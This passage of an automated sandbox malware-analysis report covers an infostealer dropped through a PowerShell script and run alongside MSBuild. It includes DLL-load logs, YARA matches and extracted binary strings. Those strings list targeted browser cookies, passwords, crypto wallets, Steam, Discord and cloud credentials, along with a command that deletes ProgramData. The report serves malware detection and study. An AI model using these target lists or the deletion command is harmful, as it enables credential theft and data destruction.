Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: vdr1.pdb source: s4xltbnq.rm5.exe, 00000004.00000002.2301833999.00000000051DF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe
Source: Binary string: A{"id":1,"method":"Storage.getCookies"}|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2:22.ps15121Windows 11HTTP/1.1HARDWA
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: s4xltbnq.rm5.exe, 00000004.00000002.2301833999.0000000005167000.00000004.00000800.00020000.00000000.sdmp, s4xltbnq.rm5.exe, 00000004.00000002.2301833999.00000000051DF000.00000004.00000800.00020000.00000000.sdmp, s4xltbnq.rm5.exe, 00000004.00000002.2338297789.00000000077B0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: s4xltbnq.rm5.exe, 00000004.00000002.2301833999.0000000005167000.00000004.00000800.00020000.00000000.sdmp, s4xltbnq.rm5.exe, 00000004.00000002.2301833999.00000000051DF000.00000004.00000800.00020000.00000000.sdmp, s4xltbnq.rm5.exe, 00000004.00000002.2338297789.00000000077B0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: wReserved3..?.@.......bVal..?.@.......iVal..?.@.......lVal..?.@.......fltVal..?.@.......dblVal..X.@.......vbool..@.@.......scode..?.@.......cyVal..?.@.......date....@.......bstrVal....@.......unkVal....@.......dispVal... D.......parray............pbVal............piVal............plVal............pfltVal............pdblVal............pbool............pscode............pcyVal............pdate............pbstrVal............punkVal............pdispVal............pparray..?+@.......pvarVal....@.......byRef..0.@.......cVal..?.@.......uiVal..?.@.......ulVal....@.......llVal..4.@.......ullVal..?.@.......intVal..?.@.......uintVal..?"D.......pdecVal..?.@.......pcVal..?DA.......puiVal..4+@.......pulVal..4+@.......pintVal..?+@.......puintVal............pllVal............pullVal....@.......pvRecord....@. source: powershell.exe, 00000000.00000002.1932226381.0000023DEF539000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEE011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEFFCE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEEAA5000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: s4xltbnq.rm5.exe, 00000004.00000002.2333750743.0000000007020000.00000004.08000000.00040000.00000000.sdmp, s4xltbnq.rm5.exe, 00000004.00000003.2232408165.000000000535D000.00000004.00000800.00020000.00000000.sdmp, s4xltbnq.rm5.exe, 00000004.00000002.2301833999.0000000005118000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: s4xltbnq.rm5.exe, 00000004.00000002.2333750743.0000000007020000.00000004.08000000.00040000.00000000.sdmp, s4xltbnq.rm5.exe, 00000004.00000003.2232408165.000000000535D000.00000004.00000800.00020000.00000000.sdmp, s4xltbnq.rm5.exe, 00000004.00000002.2301833999.0000000005118000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\pgu3x4ye\pgu3x4ye.pdb source: powershell.exe, 00000000.00000002.1830624059.0000023DDDCE1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\pgu3x4ye\pgu3x4ye.pdbhPo source: powershell.exe, 00000000.00000002.1830624059.0000023DDE577000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: 4.3.s4xltbnq.rm5.exe.53e4960.0.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
Source: 4.3.s4xltbnq.rm5.exe.53e4960.0.raw.unpack, ListDecorator.cs .Net Code: Read
Source: 4.3.s4xltbnq.rm5.exe.53e4960.0.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
Source: 4.3.s4xltbnq.rm5.exe.53e4960.0.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
Source: 4.3.s4xltbnq.rm5.exe.53e4960.0.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
Source: 4.2.s4xltbnq.rm5.exe.77b0000.11.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 4.2.s4xltbnq.rm5.exe.77b0000.11.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 4.2.s4xltbnq.rm5.exe.77b0000.11.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
Source: 4.2.s4xltbnq.rm5.exe.5119550.2.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
Source: 4.2.s4xltbnq.rm5.exe.5119550.2.raw.unpack, ListDecorator.cs .Net Code: Read
Source: 4.2.s4xltbnq.rm5.exe.5119550.2.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
Source: 4.2.s4xltbnq.rm5.exe.5119550.2.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
Source: 4.2.s4xltbnq.rm5.exe.5119550.2.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
Source: Yara match File source: 4.2.s4xltbnq.rm5.exe.6f70000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.s4xltbnq.rm5.exe.535d920.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.s4xltbnq.rm5.exe.6f70000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.s4xltbnq.rm5.exe.535d920.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000003.2232408165.00000000052DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2232408165.000000000535D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2330428551.0000000006F70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2256866165.0000000004111000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: s4xltbnq.rm5.exe PID: 764, type: MEMORYSTR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pgu3x4ye\pgu3x4ye.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pgu3x4ye\pgu3x4ye.cmdline" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_0040E886 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 8_2_0040E886
Source: s4xltbnq.rm5.exe.0.dr Static PE information: real checksum: 0xaa69e19 should be: 0x54de9e
Source: s4xltbnq.rm5.exe.0.dr Static PE information: section name: .didata
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_03EE0861 push 00000003h; ret 4_2_03EE0870
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_0762CF8E pushad ; iretd 4_2_0762CF91
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_07620DE8 push eax; retf 4_2_07620DE9
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_07652743 push FFFFFF8Bh; iretd 4_2_07652747
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_0765261B push FFFFFF8Bh; iretd 4_2_0765261F
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_07656EDA push FFFFFF8Bh; iretd 4_2_07656EDC
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_076525CB push FFFFFF8Bh; ret 4_2_076525CE
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_07659DD3 push FFFFFF8Bh; iretd 4_2_07659DD5
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_0765FA40 pushfd ; ret 4_2_0765FA41
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_0765E82C push FFFFFF8Bh; iretd 4_2_0765E82E
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_07695F39 pushad ; iretd 4_2_07695F3D
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_07695A9D pushad ; iretd 4_2_07695AB1
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_0794802C push esp; retf 4_2_0794802D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\pgu3x4ye\pgu3x4ye.dll Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Source: Possible double extension: txt.ps1 Static PE information: runner.txt.ps1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_0040E886 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 8_2_0040E886
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
